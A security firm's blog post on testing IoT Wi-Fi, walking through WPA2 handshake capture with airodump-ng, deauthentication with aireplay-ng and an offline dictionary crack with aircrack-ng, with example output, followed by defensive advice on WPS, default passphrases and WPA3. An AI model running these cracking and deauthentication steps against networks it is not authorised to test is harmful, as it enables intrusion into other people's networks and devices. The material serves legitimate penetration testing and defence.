Berkner Tech

Berkner Tech Modern Hardware Security

Wi-Fi Security Testing for IoT Devices

IoT Wi-Fi security testing pipeline, from monitor mode to an offline WPA2 passphrase crack

Wi-Fi is how most consumer IoT reaches the internet, and it inherits every Wi-Fi weakness plus a few of its own. A device that supports WPS, ships a weak default passphrase, or skips protected management frames hands an attacker a foothold on the local network. Here is how I test it.

Why the Local Network Matters

Once an attacker is on the same Wi-Fi as an IoT device, every weak local service is in reach: the plaintext MQTT broker, the unauthenticated web UI, the open debug port over the network. Cracking the Wi-Fi is often the first step that makes all the others possible.

Step 1: Capture the Handshake

Put the adapter in monitor mode, find the target network, and capture the four-way handshake when a client connects:

sudo airmon-ng start wlan0
sudo airodump-ng -c 6 --bssid AA:BB:CC:11:22:33 -w cap wlan0mon
Example output
BSSID              PWR  CH  ENC  CIPHER AUTH ESSID
AA:BB:CC:11:22:33  -42   6  WPA2 CCMP   PSK  IoT-Cam-Net

[ WPA handshake: AA:BB:CC:11:22:33 ]

Step 2: Force a Reconnect

If no client connects on its own, a deauthentication frame nudges one off so it reconnects and completes the handshake on camera:

sudo aireplay-ng --deauth 5 -a AA:BB:CC:11:22:33 wlan0mon
Example output
Sending 64 directed DeAuth (code 7). STMAC: [5C:F8:21:0A:3B:7E]

Step 3: Crack It Offline

With the handshake captured, the rest is an offline dictionary attack. No lockout, no rate limit, no alert on the device:

Anatomy of an aircrack-ng WPA2 handshake crack command with a wordlist
aircrack-ng -w wordlist.txt cap-01.cap
Example output
                 Aircrack-ng 1.7
      [00:00:14] 9216 keys tested (612 k/s)

                 KEY FOUND! [ admin1234 ]

A default passphrase like admin1234 falls in seconds. That is the whole local network, and every device on it, from one weak default.

Three IoT Wi-Fi Weaknesses

The recurring offenders on connected products:

Three IoT Wi-Fi security weaknesses: WPS PIN, weak PSK, and no protected management frames

Defending an IoT Wi-Fi Product

Disable WPS, require a unique strong passphrase per unit rather than a shared default, and support WPA3 with protected management frames. Just as importantly, do not assume the local network is a trust boundary: authenticate device services even to clients already on the Wi-Fi.

Where This Fits

Wi-Fi testing and the local-network exposure it unlocks are a standard part of a connected-product penetration test. That assessment is the kind of work we do at Berkner Tech.

References and Further Reading